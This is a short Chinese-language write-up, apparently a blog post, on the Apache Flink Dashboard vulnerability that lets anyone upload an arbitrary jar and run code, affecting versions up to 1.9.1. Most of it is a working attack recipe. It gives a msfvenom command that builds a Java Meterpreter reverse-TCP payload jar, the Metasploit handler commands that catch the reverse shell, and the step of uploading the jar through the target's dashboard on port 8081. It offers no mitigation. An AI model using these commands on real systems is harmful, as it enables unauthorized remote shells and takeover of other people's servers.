0x00 简介
Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。
0x01 漏洞概述
攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的。
0x02 影响版本
至目前最新版本Apache Flink 1.9.1
rce
msf6 > msfvenom -p java/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=1122 -f jar > /root/rce.jar
msf接收会话
use exploit/multi/handler
set payload java/shell/reverse_tcp
set LHOST xx.xx.xx.xx
set LPORT 1122
show options
run
上传目标地址
http://xx.xx.xx.xx:8081/#/overview
图片.png
图片.png
结束
执行完一会儿,就可以收到会话
网友评论